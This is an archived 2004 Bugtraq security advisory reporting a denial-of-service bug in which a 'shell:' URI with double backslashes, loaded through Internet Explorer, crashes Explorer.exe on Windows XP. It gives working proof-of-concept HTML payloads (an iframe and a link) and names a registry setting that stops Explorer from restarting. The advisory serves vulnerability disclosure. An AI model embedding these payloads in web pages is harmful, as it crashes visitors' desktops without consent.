Internet Explorer Causing Explorer.exe - Null Pointer Crash

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 03/19/04

  • Next message: Shaun Colley: "Samba 'smbprint' script tmpfile vulnerability."
    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Fri, 19 Mar 2004 19:30:16 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Internet Explorer & Explorer.exe
    Vendors: http://www.microsoft.com
    Versions: Windows Xp Professional & Internet Explorer
    6.0.2600.0000.xpclnt_qfe.021108-2107
    Patched With: Q330994; Q822925; Q828750; Q824145;
    Platforms: WindowsXp
    Bug: Internet Explorer Causing Explorer.exe - Null Pointer
    Crash
    Risk: Medium - D.O.S
    Exploitation: Remote with browser
    Date: 19 Mar 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WindowsXp is currently the most common operating system in the world.
    This product must be as safe as it is common.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Lately a new function was discovered : "shell:". This function allows
    running some
    new functions remotley. There is a bug in Explorer.exe when accessing a
    filename
    with double backslash.

    For Example accessing any of the html tags below, will cause explorer to
    crash.
    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    Explorer.exe crashes when using "\\".
    "\" doesn't crash it and even %5C%5C doesn't crash it.

    There is a registery key which is turned on by default. This key
    automatically restarts
    "Explorer.exe". If this key is set to "0", Explorer.exe will not restart.

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "AutoRestartShell"=dword:00000001

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Things that are unlikeable, are NOT impossible."


  • Next message: Shaun Colley: "Samba 'smbprint' script tmpfile vulnerability."